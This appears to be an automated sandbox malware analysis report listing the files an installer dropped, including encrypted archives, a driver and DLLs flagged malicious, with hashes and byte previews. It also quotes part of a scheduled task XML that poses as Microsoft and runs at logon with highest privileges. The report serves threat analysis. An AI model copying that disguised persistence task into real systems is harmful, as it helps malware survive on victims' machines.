                          Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.

                          C:\Program Files (x86)\Windows NT\locale4.bin

                          Download File
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):74960
                          Entropy (8bit):7.99759370165655
                          Encrypted:true
                          SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                          MD5:950338D50B95A25F494EE74E97B7B7A9
                          SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                          SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                          SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                          Malicious:false
                          Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...

                          C:\Program Files (x86)\Windows NT\locale4.dat

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):74960
                          Entropy (8bit):7.997593701656546
                          Encrypted:true
                          SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                          MD5:059BA7C31F3E227356CA5F29E4AA2508
                          SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                          SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                          SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                          Malicious:false
                          Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.

                          C:\Program Files (x86)\Windows NT\locale7.bin

                          Download File
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):29730
                          Entropy (8bit):7.994290657653607
                          Encrypted:true
                          SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                          MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                          SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                          SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                          SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                          Malicious:false
                          Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.

                          C:\Program Files (x86)\Windows NT\locale7.dat

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):29730
                          Entropy (8bit):7.994290657653608
                          Encrypted:true
                          SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                          MD5:A9C8A3E00692F79E1BA9693003F85D18
                          SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                          SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                          SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                          Malicious:false
                          Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8

                          C:\Program Files (x86)\Windows NT\res.dat

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):1926576
                          Entropy (8bit):7.999906488887622
                          Encrypted:true
                          SSDEEP:49152:L4y/Tn+PJNe+AYibuF2Bpvk4cyp5InIRuqqA+hT6/sr:L4yr+P+YibuF2BVzlDISu6Xg
                          MD5:FFB10CEC4DE3B1A0A939EC3BE8E6F8B5
                          SHA1:A7FBE0DA858C732AEC1CA0E1E7A056D757B7D987
                          SHA-256:C769FE62ED2DC3B729A52D1F7D6287C0C7638ED0E43CEA3A346F05CFD3CE97B2
                          SHA-512:698C83F542F2C530DB59CF65443688927AF0862E482A47B13BD1F32E134C2E76B4502DDAE3F9DC593077AAC6A87E999343513D13B2F559B296BE5593F71E5BCC
                          Malicious:false
                          Preview:7z..'...<.cZPe......@.......1..5bl.U..V...&'....3..!I.cm..BA....T.....K....t&.L.5..6....$i%+)...........2B&...+....s8..n^.{}=..*.I.E.lA.y.^...w!..1.1..J.&...B'.LA,.......v0.7.L%....6^.w...f..g.)/0.....k....z.H3...g.......B'.3#......@...cJ.4.>....g.;...~2.Nz....i.'a.h.....>.\bM....<.....2'...U...+OwN...D.....B.4.*..`..=U...u......~..............#.....CW.2......,..*.Y..3(...A=ci..W...*.7.P?.a........_raS=_]ZA0L,.....L.....a#....c......5...M.".3...f.....%...@....#i....1$1....~K.r..O......<|..^%";}....;.?)...N.Q.k?'...^.y.H^..66!..LC9.......V6....."K...D..5A.=...Q,c*.g.K.3.c.u...BBO..._.rp..].A.)\LA.2..X.A..l./.I..L,....q.3D0.Z&..Z.F.4...2P.K;...8...=..x.....{....1.........wVB%.C8.m.9..*f......c....x....:.S.48........$;B..:.a.....vs..o.....B..xh......n...C...yw..........C..-....+../..QkW.*.>-....x.....]!.*H../.f.+.+._eB.....0J...x...c'..L..:...q.....a~".#B.sz(.`..>.B#...]...F.Ck..3..B.N.....=F..r..a...v.I....8L.\.77.x.E....Mi...&M*....

                          C:\Program Files (x86)\Windows NT\tProtect.dll

                          Download File
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:PE32+ executable (native) x86-64, for MS Windows
                          Category:dropped
                          Size (bytes):63640
                          Entropy (8bit):6.482810107683822
                          Encrypted:false
                          SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                          MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                          SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                          SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                          SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 9%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................

                          C:\Program Files (x86)\Windows NT\task.xml

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          File Type:data
                          Category:dropped
                          Size (bytes):4096
                          Entropy (8bit):3.3449406240731085
                          Encrypted:false
                          SSDEEP:48:dXKLzDlnDPLL6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnDP6whldOVQOj6dKbKsz7
                          MD5:1EA10B1FA76DC2F1967E53A3FC2D43C4
                          SHA1:23EADA9D0994D5B9ADE7878493C44551C0B5CF44
                          SHA-256:2748447EBDE83E35B8984D2993A8331DAC7B7924638502024D8531A07E74C63C
                          SHA-512:15BF2663CEF3905AE3B13D0A4ABC2E3BBF1FF213BCA5C568641978D5548A7DBED2EC7FC5A00B330287E90DF675EFB804613D4801F6995C7748840CC0BCBA637F
                          Malicious:false
                          Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAv

                          C:\Program Files (x86)\Windows NT\trash

                          Download File
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):1676465
                          Entropy (8bit):7.9998930894979035
                          Encrypted:true
                          SSDEEP:24576:CgXC6MkmDNAh7Oh81cHWpSFrTRHzvGo9Tw9LvT0wizEvy1vbNtWwAmPC7pkW2A+v:CT6jmDygh8KWpSF9z9TwVL0w5y1Lb+4v
                          MD5:6ED5E5FC8671A4CF1FBC61D9434C67D8
                          SHA1:7BED7036264A0794C60D766B0B79860838917BF6
                          SHA-256:480A033FF4FCC9E64D48ED456E9162E05979F9ECF988CDF1DAB29E001F73D6B7
                          SHA-512:EB3BBD792491F152510492291784C8622D852C354487B5095F72DF94B89E68602E7CC9DCF7F03230EE8918D20E849BA7671F328BC924AB65FE7EFF44321289D4
                          Malicious:false
                          Preview:.8*...z....L.gG..Q@=...c...yj..ENkkT.2[.[e...n.[..0@.T..[.:Ru8....N~...{x.5".g.n...x.5`...x5.....;O...BCN......W.."...C}.i'.....u.j.b.m..J.kX2...91.t...kp.Ns...Ew.0S....'.e9\I..E.5;6UN..:...2.... ouL.y..M...S...mh........h.#;&.a.....=..7.......|#1.4~V;..|..E..{...Y..v......l6u*r..+.....y.HY.w..\[..4..~T.`..r......bh..".-..(......7M@...1.....zd%.9.7.....vMc.-.s`...*...D...M...U..".....3.4&.T..mU ..,.i1.L.z8wn...FQ@b@.P+....]x..v../..c........`.V...=...'.8.M._..Q~.5vj...^..J.o.9....C................k@...T..I..&.m..xh.......GV...81.X....~.X..%I6......Vy.....Q.l%~..]d..g]"...>.^..G.x.%....Q...Mu.B....E....-...4.3X.5.9%B.N.......R0f.W>.i.w.|.F....D...*s.y....4b...>.....R.D.Y.#H=..G..N).X7l.p.NV.......,.._m....nhub.-...5.3?....|.$..d...^.B..0Z.O..xUH.... .b..?.........b.M...R.<W`.K..9BR..4]X&.........>.!.~...Z.d;.2L..!aT.2.".4 .cd.,...G...ksQ.`.&................vu....z.|gSa.U...}.....:.c.....=..i.RE..I..ae.9.i.0d.._.......a.<.c.hS.pX..D.SD

                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):64
                          Entropy (8bit):1.1628158735648508
                          Encrypted:false
                          SSDEEP:3:NlllulFgtj:NllUa
                          MD5:E986DDCA20E18C878305AA21342325F6
                          SHA1:AE6890EE7BB81A051A4F4079F549DEBCCE0F82C9
                          SHA-256:9624DAA47DF80C2229877179550D8373CAEEEAE25A8123698D7A516AD455DD15
                          SHA-512:8B0CD5C1F0BAECA299669D6A0CB74F9315E90B05EDEA16C92B92D9927D3D07225AC5DAE9941CF339E1CED349BA8129F56F118CF89AB86CF8DAAAFFDB8EC8B56D
                          Malicious:false
                          Preview:@...e................................................@..........

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bgydpkvc.qr4.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_esly4uim.n0a.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rcln4f3i.ly1.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tw1jlfbb.33j.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                          C:\Users\user\AppData\Local\Temp\is-0I4KI.tmp\_isetup\_setup64.tmp

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          File Type:PE32+ executable (console) x86-64, for MS Windows
                          Category:dropped
                          Size (bytes):6144
                          Entropy (8bit):4.720366600008286
                          Encrypted:false
                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                          Malicious:false
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 0%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\is-0I4KI.tmp\update.vac

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3606016
                          Entropy (8bit):7.0063494494702985
                          Encrypted:false
                          SSDEEP:49152:/MifTj964EMRY42Kgq7eJEJqx2dhZe71MzuiehWIKxZfAtbyBSfbZmSKiyQF:/M+jcZ42KXw2dhZe71MzSRFyBSDH
                          MD5:95ACD5631A9131DB1FD066565AFC9A67
                          SHA1:8E9473BD632FF0F57FC34EECAC17174341D80D94
                          SHA-256:EA6B71519CD54AB523B822F84D5D4E5B305214DA4C37E96A02D8BC1CB182F58B
                          SHA-512:70188E7AD6B0D9DA5E88EEFC6095F99066F73FDAB10F084E3F2F96B30D8A717BAE75E9C1B476FB996BC86B9A753AAF26F96024D0068090B437EACE6E5BE35681
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 24%
                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Fig...........!.....h....................................................7...........@.........................XC.......J..<....07.X....................@7..?...................................................K...............................text....f.......h.................. ..`.rdata..T............l..............@..@.data................b..............@....00cfg.......`(......"(.............@..@.tls.........p(......$(.............@....voltbl.F.....(......&(..................#.q....P.....(......((............. ..`.rsrc...X....07.......6.............@..@.reloc...?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp

                          Download File
                          Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3366912
                          Entropy (8bit):6.530563595191976
                          Encrypted:false
                          SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                          MD5:6A58BEB829BD96D5574E24C76DD36FD9
                          SHA1:BE041E04908055F3CAC715ADCC9C0BB13227CCE9
                          SHA-256:2123EE41F3BE09DBC56B39DC3F6DEC504086C6AB38AC62797F1C00EB7CAF9C5B
                          SHA-512:B5C68FC8BD472470763A0C4AF6BA5FB7D27B285D48F697161688AC32B26B9E764B477F53D25F3FE3C7D7FF79466BAAC87A294A106CE7E2C646389E7B1760A534
                          Malicious:true
                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

                          C:\Users\user\AppData\Local\Temp\is-EGUA2.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp

                          Download File
                          Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.3.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3366912
                          Entropy (8bit):6.530563595191976
                          Encrypted:false
                          SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                          MD5:6A58BEB829BD96D5574E24C76DD36FD9
                          SHA1:BE041E04908055F3CAC715ADCC9C0BB13227CCE9
                          SHA-256:2123EE41F3BE09DBC56B39DC3F6DEC504086C6AB38AC62797F1C00EB7CAF9C5B
                          SHA-512:B5C68FC8BD472470763A0C4AF6BA5FB7D27B285D48F697161688AC32B26B9E764B477F53D25F3FE3C7D7FF79466BAAC87A294A106CE7E2C646389E7B1760A534
                          Malicious:true
                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

                          C:\Users\user\AppData\Local\Temp\is-GMAHF.tmp\_isetup\_setup64.tmp

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          File Type:PE32+ executable (console) x86-64, for MS Windows
                          Category:dropped
                          Size (bytes):6144
                          Entropy (8bit):4.720366600008286
                          Encrypted:false
                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                          Malicious:false
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 0%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\is-GMAHF.tmp\update.vac

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\is-4E5DT.tmp\#U5b89#U88c5#U52a9#U624b2.0.3.tmp
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):3606016
                          Entropy (8bit):7.0063494494702985
                          Encrypted:false
                          SSDEEP:49152:/MifTj964EMRY42Kgq7eJEJqx2dhZe71MzuiehWIKxZfAtbyBSfbZmSKiyQF:/M+jcZ42KXw2dhZe71MzSRFyBSDH
                          MD5:95ACD5631A9131DB1FD066565AFC9A67
                          SHA1:8E9473BD632FF0F57FC34EECAC17174341D80D94
